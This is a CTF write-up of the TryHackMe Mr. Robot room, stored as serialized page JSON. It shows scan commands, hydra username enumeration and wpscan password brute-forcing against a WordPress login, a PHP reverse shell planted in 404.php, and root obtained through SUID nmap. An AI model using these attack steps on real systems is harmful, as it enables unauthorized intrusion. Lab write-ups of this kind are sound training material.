[{"data":1,"prerenderedAt":998},["ShallowReactive",2],{"\u002F2025\u002Ftryhackme-mrrobot-writeup":3,"surround-\u002F2025\u002Ftryhackme-mrrobot-writeup":989},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"updated":10,"image":11,"categories":12,"tags":14,"recommend":17,"draft":6,"readingTime":18,"body":23,"_type":982,"_id":983,"_source":984,"_file":985,"_stem":986,"_extension":987,"_original_dir":988},"\u002F2025\u002Ftryhackme-mrrobot-writeup","2025",false,"","TryHackMe - Mr.Robot","A detailed writeup for the TryHackMe Mr. Robot room. This walkthrough covers everything from initial reconnaissance and exploiting a WordPress site to gaining a root shell through privilege escalation.","2025-11-05T06:21:29.000Z","https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002Fthumbnail.jpg",[13],"CTF",[15,16],"Linux","Medium",true,{"text":19,"minutes":20,"time":21,"words":22},"3 min read",2.66,159600,532,{"type":24,"children":25,"toc":972},"root",[26,32,48,55,173,177,181,186,235,239,260,264,268,281,285,290,354,358,364,371,384,417,421,425,438,450,454,458,471,479,492,555,599,603,623,674,678,691,695,699,705,718,722,750,754,766,770,799,803,816,820,833,837,843,848,898,902,915,919,957,962,966],{"type":27,"tag":28,"props":29,"children":31},"element","pic",{"src":30},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F1.jpg",[],{"type":27,"tag":33,"props":34,"children":35},"p",{},[36,39],{"type":37,"value":38},"text","Target IP: ",{"type":27,"tag":40,"props":41,"children":45},"a",{"href":42,"rel":43},"https:\u002F\u002Ftryhackme.com\u002Froom\u002Fmrrobot",[44],"nofollow",[46],{"type":37,"value":47},"10.10.227.208",{"type":27,"tag":49,"props":50,"children":52},"h2",{"id":51},"reconnaissance",[53],{"type":37,"value":54},"Reconnaissance",{"type":27,"tag":56,"props":57,"children":61},"pre",{"code":58,"language":59,"meta":7,"className":60,"style":7},"sudo rustscan -b 8192 -u 16384 -a 10.10.227.208 -- -sS -sV -sC -oN 10.10.227.208.$(basename $PWD).nmap.txt\n","bash","language-bash shiki shiki-themes catppuccin-latte one-dark-pro",[62],{"type":27,"tag":63,"props":64,"children":65},"code",{"__ignoreMap":7},[66],{"type":27,"tag":67,"props":68,"children":71},"span",{"class":69,"line":70},"line",1,[72,78,84,90,96,101,106,111,116,121,126,131,136,141,146,152,157,163,168],{"type":27,"tag":67,"props":73,"children":75},{"style":74},"--shiki-default:#1E66F5;--shiki-default-font-style:italic;--shiki-dark:#61AFEF;--shiki-dark-font-style:inherit",[76],{"type":37,"value":77},"sudo",{"type":27,"tag":67,"props":79,"children":81},{"style":80},"--shiki-default:#40A02B;--shiki-dark:#98C379",[82],{"type":37,"value":83}," rustscan",{"type":27,"tag":67,"props":85,"children":87},{"style":86},"--shiki-default:#40A02B;--shiki-dark:#D19A66",[88],{"type":37,"value":89}," -b",{"type":27,"tag":67,"props":91,"children":93},{"style":92},"--shiki-default:#FE640B;--shiki-dark:#D19A66",[94],{"type":37,"value":95}," 8192",{"type":27,"tag":67,"props":97,"children":98},{"style":86},[99],{"type":37,"value":100}," -u",{"type":27,"tag":67,"props":102,"children":103},{"style":92},[104],{"type":37,"value":105}," 16384",{"type":27,"tag":67,"props":107,"children":108},{"style":86},[109],{"type":37,"value":110}," -a",{"type":27,"tag":67,"props":112,"children":113},{"style":92},[114],{"type":37,"value":115}," 10.10.227.208",{"type":27,"tag":67,"props":117,"children":118},{"style":86},[119],{"type":37,"value":120}," --",{"type":27,"tag":67,"props":122,"children":123},{"style":86},[124],{"type":37,"value":125}," -sS",{"type":27,"tag":67,"props":127,"children":128},{"style":86},[129],{"type":37,"value":130}," -sV",{"type":27,"tag":67,"props":132,"children":133},{"style":86},[134],{"type":37,"value":135}," -sC",{"type":27,"tag":67,"props":137,"children":138},{"style":86},[139],{"type":37,"value":140}," -oN",{"type":27,"tag":67,"props":142,"children":143},{"style":80},[144],{"type":37,"value":145}," 10.10.227.208.",{"type":27,"tag":67,"props":147,"children":149},{"style":148},"--shiki-default:#7C7F93;--shiki-dark:#ABB2BF",[150],{"type":37,"value":151},"$(",{"type":27,"tag":67,"props":153,"children":154},{"style":74},[155],{"type":37,"value":156},"basename",{"type":27,"tag":67,"props":158,"children":160},{"style":159},"--shiki-default:#4C4F69;--shiki-dark:#E06C75",[161],{"type":37,"value":162}," $PWD",{"type":27,"tag":67,"props":164,"children":165},{"style":148},[166],{"type":37,"value":167},")",{"type":27,"tag":67,"props":169,"children":170},{"style":80},[171],{"type":37,"value":172},".nmap.txt\n",{"type":27,"tag":28,"props":174,"children":176},{"src":175},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F2.jpg",[],{"type":27,"tag":28,"props":178,"children":180},{"src":179},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F3.jpg",[],{"type":27,"tag":33,"props":182,"children":183},{},[184],{"type":37,"value":185},"We see that a web server is up on the target. Upon inspection, we don't find much. So, let's perform a directory scan.",{"type":27,"tag":56,"props":187,"children":189},{"code":188,"language":59,"meta":7,"className":60,"style":7},"feroxbuster -eBEg -d 1 -u http:\u002F\u002F10.10.227.208 --wordlist \u002Fusr\u002Fshare\u002Fwordlists\u002Fdirb\u002Fcommon.txt\n",[190],{"type":27,"tag":63,"props":191,"children":192},{"__ignoreMap":7},[193],{"type":27,"tag":67,"props":194,"children":195},{"class":69,"line":70},[196,201,206,211,216,220,225,230],{"type":27,"tag":67,"props":197,"children":198},{"style":74},[199],{"type":37,"value":200},"feroxbuster",{"type":27,"tag":67,"props":202,"children":203},{"style":86},[204],{"type":37,"value":205}," -eBEg",{"type":27,"tag":67,"props":207,"children":208},{"style":86},[209],{"type":37,"value":210}," -d",{"type":27,"tag":67,"props":212,"children":213},{"style":92},[214],{"type":37,"value":215}," 1",{"type":27,"tag":67,"props":217,"children":218},{"style":86},[219],{"type":37,"value":100},{"type":27,"tag":67,"props":221,"children":222},{"style":80},[223],{"type":37,"value":224}," http:\u002F\u002F10.10.227.208",{"type":27,"tag":67,"props":226,"children":227},{"style":86},[228],{"type":37,"value":229}," --wordlist",{"type":27,"tag":67,"props":231,"children":232},{"style":80},[233],{"type":37,"value":234}," \u002Fusr\u002Fshare\u002Fwordlists\u002Fdirb\u002Fcommon.txt\n",{"type":27,"tag":28,"props":236,"children":238},{"src":237},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F4.jpg",[],{"type":27,"tag":33,"props":240,"children":241},{},[242,244,250,252,258],{"type":37,"value":243},"Here, the ",{"type":27,"tag":63,"props":245,"children":247},{"className":246},[],[248],{"type":37,"value":249},"\u002Frobots",{"type":37,"value":251}," and ",{"type":27,"tag":63,"props":253,"children":255},{"className":254},[],[256],{"type":37,"value":257},"\u002Fwp-login",{"type":37,"value":259}," pages catch our attention. From this, we understand that the site is running on WordPress.",{"type":27,"tag":28,"props":261,"children":263},{"src":262},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F5.jpg",[],{"type":27,"tag":28,"props":265,"children":267},{"src":266},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F6.jpg",[],{"type":27,"tag":33,"props":269,"children":270},{},[271,273,279],{"type":37,"value":272},"From here, we obtain our first flag and the ",{"type":27,"tag":63,"props":274,"children":276},{"className":275},[],[277],{"type":37,"value":278},"fsocity.dic",{"type":37,"value":280}," file. Now, let's inspect this file.",{"type":27,"tag":28,"props":282,"children":284},{"src":283},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F7.jpg",[],{"type":27,"tag":33,"props":286,"children":287},{},[288],{"type":37,"value":289},"Looking at this file, we immediately see that it is a word list. Therefore, we can use it to perform a brute force attack on the login page. First, let's download the word list and remove duplicate entries.",{"type":27,"tag":56,"props":291,"children":293},{"code":292,"language":59,"meta":7,"className":60,"style":7},"curl -o wordlist.txt http:\u002F\u002F10.10.227.208\u002Ffsocity.dic\nsort wordlist.txt | uniq > newwordlist.txt\n",[294],{"type":27,"tag":63,"props":295,"children":296},{"__ignoreMap":7},[297,320],{"type":27,"tag":67,"props":298,"children":299},{"class":69,"line":70},[300,305,310,315],{"type":27,"tag":67,"props":301,"children":302},{"style":74},[303],{"type":37,"value":304},"curl",{"type":27,"tag":67,"props":306,"children":307},{"style":86},[308],{"type":37,"value":309}," -o",{"type":27,"tag":67,"props":311,"children":312},{"style":80},[313],{"type":37,"value":314}," wordlist.txt",{"type":27,"tag":67,"props":316,"children":317},{"style":80},[318],{"type":37,"value":319}," http:\u002F\u002F10.10.227.208\u002Ffsocity.dic\n",{"type":27,"tag":67,"props":321,"children":323},{"class":69,"line":322},2,[324,329,333,339,344,349],{"type":27,"tag":67,"props":325,"children":326},{"style":74},[327],{"type":37,"value":328},"sort",{"type":27,"tag":67,"props":330,"children":331},{"style":80},[332],{"type":37,"value":314},{"type":27,"tag":67,"props":334,"children":336},{"style":335},"--shiki-default:#179299;--shiki-dark:#ABB2BF",[337],{"type":37,"value":338}," |",{"type":27,"tag":67,"props":340,"children":341},{"style":74},[342],{"type":37,"value":343}," uniq",{"type":27,"tag":67,"props":345,"children":346},{"style":335},[347],{"type":37,"value":348}," >",{"type":27,"tag":67,"props":350,"children":351},{"style":80},[352],{"type":37,"value":353}," newwordlist.txt\n",{"type":27,"tag":28,"props":355,"children":357},{"src":356},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F8.jpg",[],{"type":27,"tag":49,"props":359,"children":361},{"id":360},"initial-access",[362],{"type":37,"value":363},"Initial Access",{"type":27,"tag":365,"props":366,"children":368},"h3",{"id":367},"wordpress-panel",[369],{"type":37,"value":370},"WordPress Panel",{"type":27,"tag":33,"props":372,"children":373},{},[374,376,382],{"type":37,"value":375},"We hope to crack the password with this wordlist, but we also need a username. First, let's run a scan with ",{"type":27,"tag":63,"props":377,"children":379},{"className":378},[],[380],{"type":37,"value":381},"wpscan",{"type":37,"value":383}," on the WordPress site to enumerate users. If that fails, we'll have to bruteforce the username as well.",{"type":27,"tag":56,"props":385,"children":387},{"code":386,"language":59,"meta":7,"className":60,"style":7},"wpscan --url 10.10.227.208 --enumerate u\n",[388],{"type":27,"tag":63,"props":389,"children":390},{"__ignoreMap":7},[391],{"type":27,"tag":67,"props":392,"children":393},{"class":69,"line":70},[394,398,403,407,412],{"type":27,"tag":67,"props":395,"children":396},{"style":74},[397],{"type":37,"value":381},{"type":27,"tag":67,"props":399,"children":400},{"style":86},[401],{"type":37,"value":402}," --url",{"type":27,"tag":67,"props":404,"children":405},{"style":92},[406],{"type":37,"value":115},{"type":27,"tag":67,"props":408,"children":409},{"style":86},[410],{"type":37,"value":411}," --enumerate",{"type":27,"tag":67,"props":413,"children":414},{"style":80},[415],{"type":37,"value":416}," u\n",{"type":27,"tag":28,"props":418,"children":420},{"src":419},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F9.jpg",[],{"type":27,"tag":28,"props":422,"children":424},{"src":423},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F10.jpg",[],{"type":27,"tag":33,"props":426,"children":427},{},[428,430,436],{"type":37,"value":429},"Unfortunately, we couldn't find a username. The only option left is to bruteforce the username using our wordlist. I will use ",{"type":27,"tag":63,"props":431,"children":433},{"className":432},[],[434],{"type":37,"value":435},"hydra",{"type":37,"value":437}," for this, but this can also be easily done with the Pro version of Burp Suite.",{"type":27,"tag":33,"props":439,"children":440},{},[441,443,448],{"type":37,"value":442},"First, let's examine the request in Burp to understand how the login works. I'll fill in the fields on the ",{"type":27,"tag":63,"props":444,"children":446},{"className":445},[],[447],{"type":37,"value":257},{"type":37,"value":449}," page with random data and inspect the request.",{"type":27,"tag":28,"props":451,"children":453},{"src":452},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F11.jpg",[],{"type":27,"tag":28,"props":455,"children":457},{"src":456},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F12.jpg",[],{"type":27,"tag":33,"props":459,"children":460},{},[461,463,469],{"type":37,"value":462},"We can see that we are sending a POST request to ",{"type":27,"tag":63,"props":464,"children":466},{"className":465},[],[467],{"type":37,"value":468},"\u002Fwp-login.php",{"type":37,"value":470}," with the following data.",{"type":27,"tag":56,"props":472,"children":474},{"code":473},"log=admin&pwd=admin&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.227.208%2Fwp-admin%2F&testcookie=1\n",[475],{"type":27,"tag":63,"props":476,"children":477},{"__ignoreMap":7},[478],{"type":37,"value":473},{"type":27,"tag":33,"props":480,"children":481},{},[482,484,490],{"type":37,"value":483},"When we send the request, we see the text ",{"type":27,"tag":63,"props":485,"children":487},{"className":486},[],[488],{"type":37,"value":489},"ERROR: Invalid username",{"type":37,"value":491}," on the page. This is very important for us, as it allows us to determine if a username attempt is valid.",{"type":27,"tag":56,"props":493,"children":495},{"code":494,"language":59,"meta":7,"className":60,"style":7},"hydra -t 64 -V -L newwordlist.txt -p test 10.10.227.208 http-form-post '\u002Fwp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.227.208%2Fwp-admin%2F&testcookie=1:F=Invalid username'\n",[496],{"type":27,"tag":63,"props":497,"children":498},{"__ignoreMap":7},[499],{"type":27,"tag":67,"props":500,"children":501},{"class":69,"line":70},[502,506,511,516,521,526,531,536,541,545,550],{"type":27,"tag":67,"props":503,"children":504},{"style":74},[505],{"type":37,"value":435},{"type":27,"tag":67,"props":507,"children":508},{"style":86},[509],{"type":37,"value":510}," -t",{"type":27,"tag":67,"props":512,"children":513},{"style":92},[514],{"type":37,"value":515}," 64",{"type":27,"tag":67,"props":517,"children":518},{"style":86},[519],{"type":37,"value":520}," -V",{"type":27,"tag":67,"props":522,"children":523},{"style":86},[524],{"type":37,"value":525}," -L",{"type":27,"tag":67,"props":527,"children":528},{"style":80},[529],{"type":37,"value":530}," newwordlist.txt",{"type":27,"tag":67,"props":532,"children":533},{"style":86},[534],{"type":37,"value":535}," -p",{"type":27,"tag":67,"props":537,"children":538},{"style":80},[539],{"type":37,"value":540}," test",{"type":27,"tag":67,"props":542,"children":543},{"style":92},[544],{"type":37,"value":115},{"type":27,"tag":67,"props":546,"children":547},{"style":80},[548],{"type":37,"value":549}," http-form-post",{"type":27,"tag":67,"props":551,"children":552},{"style":80},[553],{"type":37,"value":554}," '\u002Fwp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.227.208%2Fwp-admin%2F&testcookie=1:F=Invalid username'\n",{"type":27,"tag":33,"props":556,"children":557},{},[558,560,565,567,573,575,581,583,589,591,597],{"type":37,"value":559},"This command performs a username enumeration attack on the WordPress site at ",{"type":27,"tag":63,"props":561,"children":563},{"className":562},[],[564],{"type":37,"value":47},{"type":37,"value":566}," by trying usernames from ",{"type":27,"tag":63,"props":568,"children":570},{"className":569},[],[571],{"type":37,"value":572},"newwordlist.txt",{"type":37,"value":574}," with the password ",{"type":27,"tag":63,"props":576,"children":578},{"className":577},[],[579],{"type":37,"value":580},"test",{"type":37,"value":582},". The ",{"type":27,"tag":63,"props":584,"children":586},{"className":585},[],[587],{"type":37,"value":588},"F=Invalid username",{"type":37,"value":590}," flag is a rule given to Hydra to exploit this vulnerability. This rule tells Hydra to 'read the response and if the text ",{"type":27,"tag":63,"props":592,"children":594},{"className":593},[],[595],{"type":37,"value":596},"Invalid username",{"type":37,"value":598}," is NOT present, report it as a SUCCESS.'",{"type":27,"tag":28,"props":600,"children":602},{"src":601},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F13.jpg",[],{"type":27,"tag":33,"props":604,"children":605},{},[606,608,614,616,621],{"type":37,"value":607},"And yes, ",{"type":27,"tag":63,"props":609,"children":611},{"className":610},[],[612],{"type":37,"value":613},"elliot",{"type":37,"value":615}," is our username. Now, let's perform a password bruteforce attack using this username. We'll use ",{"type":27,"tag":63,"props":617,"children":619},{"className":618},[],[620],{"type":37,"value":381},{"type":37,"value":622}," as it's fast.",{"type":27,"tag":56,"props":624,"children":626},{"code":625,"language":59,"meta":7,"className":60,"style":7},"wpscan --url 10.10.227.208 --usernames elliot --passwords newwordlist.txt threads 40\n",[627],{"type":27,"tag":63,"props":628,"children":629},{"__ignoreMap":7},[630],{"type":27,"tag":67,"props":631,"children":632},{"class":69,"line":70},[633,637,641,645,650,655,660,664,669],{"type":27,"tag":67,"props":634,"children":635},{"style":74},[636],{"type":37,"value":381},{"type":27,"tag":67,"props":638,"children":639},{"style":86},[640],{"type":37,"value":402},{"type":27,"tag":67,"props":642,"children":643},{"style":92},[644],{"type":37,"value":115},{"type":27,"tag":67,"props":646,"children":647},{"style":86},[648],{"type":37,"value":649}," --usernames",{"type":27,"tag":67,"props":651,"children":652},{"style":80},[653],{"type":37,"value":654}," elliot",{"type":27,"tag":67,"props":656,"children":657},{"style":86},[658],{"type":37,"value":659}," --passwords",{"type":27,"tag":67,"props":661,"children":662},{"style":80},[663],{"type":37,"value":530},{"type":27,"tag":67,"props":665,"children":666},{"style":80},[667],{"type":37,"value":668}," threads",{"type":27,"tag":67,"props":670,"children":671},{"style":92},[672],{"type":37,"value":673}," 40\n",{"type":27,"tag":28,"props":675,"children":677},{"src":676},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F14.jpg",[],{"type":27,"tag":33,"props":679,"children":680},{},[681,683,689],{"type":37,"value":682},"We've obtained the pair ",{"type":27,"tag":63,"props":684,"children":686},{"className":685},[],[687],{"type":37,"value":688},"Elliot:ER28-0652",{"type":37,"value":690},". Now let's log into the WordPress dashboard with these credentials.",{"type":27,"tag":28,"props":692,"children":694},{"src":693},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F15.jpg",[],{"type":27,"tag":28,"props":696,"children":698},{"src":697},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F16.jpg",[],{"type":27,"tag":365,"props":700,"children":702},{"id":701},"shell",[703],{"type":37,"value":704},"Shell",{"type":27,"tag":33,"props":706,"children":707},{},[708,710,716],{"type":37,"value":709},"Inspecting the dashboard, we see that we can edit the ",{"type":27,"tag":63,"props":711,"children":713},{"className":712},[],[714],{"type":37,"value":715},"404.php",{"type":37,"value":717}," page in the theme editor.",{"type":27,"tag":28,"props":719,"children":721},{"src":720},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F17.jpg",[],{"type":27,"tag":33,"props":723,"children":724},{},[725,727,733,735,740,742,748],{"type":37,"value":726},"Therefore, we can place a ",{"type":27,"tag":63,"props":728,"children":730},{"className":729},[],[731],{"type":37,"value":732},"php reverse shell",{"type":37,"value":734}," here and get a shell when we make a request to the ",{"type":27,"tag":63,"props":736,"children":738},{"className":737},[],[739],{"type":37,"value":715},{"type":37,"value":741}," page. I will use the reverse shell located at ",{"type":27,"tag":63,"props":743,"children":745},{"className":744},[],[746],{"type":37,"value":747},"\u002Fusr\u002Fshare\u002Fwebshells\u002Fphp\u002F",{"type":37,"value":749}," on Kali. Let's open this shell and configure it.",{"type":27,"tag":28,"props":751,"children":753},{"src":752},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F18.jpg",[],{"type":27,"tag":33,"props":755,"children":756},{},[757,759,764],{"type":37,"value":758},"Now, let's paste this into the ",{"type":27,"tag":63,"props":760,"children":762},{"className":761},[],[763],{"type":37,"value":715},{"type":37,"value":765}," page and get our reverse shell.",{"type":27,"tag":28,"props":767,"children":769},{"src":768},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F19.jpg",[],{"type":27,"tag":33,"props":771,"children":772},{},[773,775,781,783,789,791,797],{"type":37,"value":774},"Yes, we are the ",{"type":27,"tag":63,"props":776,"children":778},{"className":777},[],[779],{"type":37,"value":780},"daemon",{"type":37,"value":782}," user. Manually exploring the system, we find our flag and a ",{"type":27,"tag":63,"props":784,"children":786},{"className":785},[],[787],{"type":37,"value":788},"password.raw-md5",{"type":37,"value":790}," file in the ",{"type":27,"tag":63,"props":792,"children":794},{"className":793},[],[795],{"type":37,"value":796},"\u002Fhome\u002Frobot",{"type":37,"value":798}," directory. We can read this password file.",{"type":27,"tag":28,"props":800,"children":802},{"src":801},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F20.jpg",[],{"type":27,"tag":33,"props":804,"children":805},{},[806,808,814],{"type":37,"value":807},"We see that this contains the credentials for the ",{"type":27,"tag":63,"props":809,"children":811},{"className":810},[],[812],{"type":37,"value":813},"robot",{"type":37,"value":815}," user. However, the password is MD5 hashed. Let's crack it using CrackStation.",{"type":27,"tag":28,"props":817,"children":819},{"src":818},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F21.jpg",[],{"type":27,"tag":33,"props":821,"children":822},{},[823,825,831],{"type":37,"value":824},"Now, let's start a clean ",{"type":27,"tag":63,"props":826,"children":828},{"className":827},[],[829],{"type":37,"value":830},"ssh",{"type":37,"value":832}," session with the password we obtained.",{"type":27,"tag":28,"props":834,"children":836},{"src":835},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F22.jpg",[],{"type":27,"tag":49,"props":838,"children":840},{"id":839},"privilege-escalation",[841],{"type":37,"value":842},"Privilege Escalation",{"type":27,"tag":33,"props":844,"children":845},{},[846],{"type":37,"value":847},"While manually enumerating the target, we see that an SUID bit is set on a non-default binary.",{"type":27,"tag":56,"props":849,"children":851},{"code":850,"language":59,"meta":7,"className":60,"style":7},"find \u002F -perm -u=s -type f 2>\u002Fdev\u002Fnull\n",[852],{"type":27,"tag":63,"props":853,"children":854},{"__ignoreMap":7},[855],{"type":27,"tag":67,"props":856,"children":857},{"class":69,"line":70},[858,863,868,873,878,883,888,893],{"type":27,"tag":67,"props":859,"children":860},{"style":74},[861],{"type":37,"value":862},"find",{"type":27,"tag":67,"props":864,"children":865},{"style":80},[866],{"type":37,"value":867}," \u002F",{"type":27,"tag":67,"props":869,"children":870},{"style":86},[871],{"type":37,"value":872}," -perm",{"type":27,"tag":67,"props":874,"children":875},{"style":86},[876],{"type":37,"value":877}," -u=s",{"type":27,"tag":67,"props":879,"children":880},{"style":86},[881],{"type":37,"value":882}," -type",{"type":27,"tag":67,"props":884,"children":885},{"style":80},[886],{"type":37,"value":887}," f",{"type":27,"tag":67,"props":889,"children":890},{"style":335},[891],{"type":37,"value":892}," 2>",{"type":27,"tag":67,"props":894,"children":895},{"style":80},[896],{"type":37,"value":897},"\u002Fdev\u002Fnull\n",{"type":27,"tag":28,"props":899,"children":901},{"src":900},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F23.jpg",[],{"type":27,"tag":33,"props":903,"children":904},{},[905,907,913],{"type":37,"value":906},"We learn how to get a shell from ",{"type":27,"tag":40,"props":908,"children":911},{"href":909,"rel":910},"https:\u002F\u002Fgtfobins.github.io\u002Fgtfobins\u002Fnmap\u002F",[44],[912],{"type":37,"value":909},{"type":37,"value":914},".",{"type":27,"tag":28,"props":916,"children":918},{"src":917},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F24.jpg",[],{"type":27,"tag":56,"props":920,"children":922},{"code":921,"language":59,"meta":7,"className":60,"style":7},"nmap --interactive\nnmap> !sh\n",[923],{"type":27,"tag":63,"props":924,"children":925},{"__ignoreMap":7},[926,939],{"type":27,"tag":67,"props":927,"children":928},{"class":69,"line":70},[929,934],{"type":27,"tag":67,"props":930,"children":931},{"style":74},[932],{"type":37,"value":933},"nmap",{"type":27,"tag":67,"props":935,"children":936},{"style":86},[937],{"type":37,"value":938}," --interactive\n",{"type":27,"tag":67,"props":940,"children":941},{"class":69,"line":322},[942,946,952],{"type":27,"tag":67,"props":943,"children":944},{"style":74},[945],{"type":37,"value":933},{"type":27,"tag":67,"props":947,"children":949},{"style":948},"--shiki-default:#4C4F69;--shiki-dark:#ABB2BF",[950],{"type":37,"value":951},"> ",{"type":27,"tag":67,"props":953,"children":954},{"style":80},[955],{"type":37,"value":956},"!sh\n",{"type":27,"tag":33,"props":958,"children":959},{},[960],{"type":37,"value":961},"By executing these commands step-by-step, we obtain our root shell.",{"type":27,"tag":28,"props":963,"children":965},{"src":964},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-mrRobot-writeup\u002F25.jpg",[],{"type":27,"tag":967,"props":968,"children":969},"style",{},[970],{"type":37,"value":971},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":7,"searchDepth":973,"depth":973,"links":974},4,[975,976,981],{"id":51,"depth":322,"text":54},{"id":360,"depth":322,"text":363,"children":977},[978,980],{"id":367,"depth":979,"text":370},3,{"id":701,"depth":979,"text":704},{"id":839,"depth":322,"text":842},"markdown","content:posts:2025:tryhackme-mrRobot-writeup.md","content","posts\u002F2025\u002Ftryhackme-mrRobot-writeup.md","posts\u002F2025\u002Ftryhackme-mrRobot-writeup","md","\u002Fposts",[990,994],{"_path":991,"title":992,"date":993},"\u002F2025\u002Fhtb-artificial-writeup","HTB - Artificial","2025-10-29T11:40:48.000Z",{"_path":995,"title":996,"date":997},"\u002F2025\u002Faws-ve-bulut-bilisim-temelleri","1 - AWS ve Bulut Bilişim Temelleri","2025-11-22T13:33:47.000Z",1777022957318]